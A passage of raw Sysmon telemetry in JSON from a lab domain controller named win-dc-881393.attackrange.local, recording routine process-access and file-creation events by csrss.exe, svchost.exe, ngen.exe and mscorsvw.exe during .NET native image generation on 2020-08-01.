C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:16.915","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-043C-5F25-0000-001029E40B00}","TargetProcessId":"5104","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6391,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:16.931\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-043C-5F25-0000-001029E40B00}\r\nTargetProcessId: 5104\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:16.931","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-043C-5F25-0000-001029E40B00}","TargetProcessId":"5104","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6392,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:16.962\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-043C-5F25-0000-001052E70B00}\r\nTargetProcessId: 4840\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:16.962","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-043C-5F25-0000-001052E70B00}","TargetProcessId":"4840","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6393,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:16.962\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-043C-5F25-0000-001052E70B00}\r\nTargetProcessId: 4840\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:16.962","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-043C-5F25-0000-001052E70B00}","TargetProcessId":"4840","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6394,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:16.978\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-043C-5F25-0000-001052E70B00}\r\nTargetProcessId: 4840\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:16.978","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-043C-5F25-0000-001052E70B00}","TargetProcessId":"4840","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:17","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6395,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:57:17.790\r\nProcessGuid: {A837DB8D-043C-5F25-0000-001052E70B00}\r\nProcessId: 4840\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12e8-0\\System.DirectoryServices.dll\r\nCreationUtcTime: 2020-08-01 05:57:17.790","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:57:17.790","ProcessGuid":"{A837DB8D-043C-5F25-0000-001052E70B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12e8-0\\System.DirectoryServices.dll","CreationUtcTime":"2020-08-01 05:57:17.790","EventReceivedTime":"2020-08-01 05:57:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:17","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6396,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:17.837\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-043D-5F25-0000-001053EB0B00}\r\nTargetProcessId: 3944\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:17.837","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-043D-5F25-0000-001053EB0B00}","TargetProcessId":"3944","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:17","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6397,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:17.837\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-043D-5F25-0000-001053EB0B00}\r\nTargetProcessId: 3944\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:17.837","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-043D-5F25-0000-001053EB0B00}","TargetProcessId":"3944","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:17","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6398,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:17.837\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-043D-5F25-0000-001053EB0B00}\r\nTargetProcessId: 3944\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:17.837","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-043D-5F25-0000-001053EB0B00}","TargetProcessId":"3944","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:17","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6399,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:17.884\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-043D-5F25-0000-0010B9EE0B00}\r\nTargetProcessId: 1320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 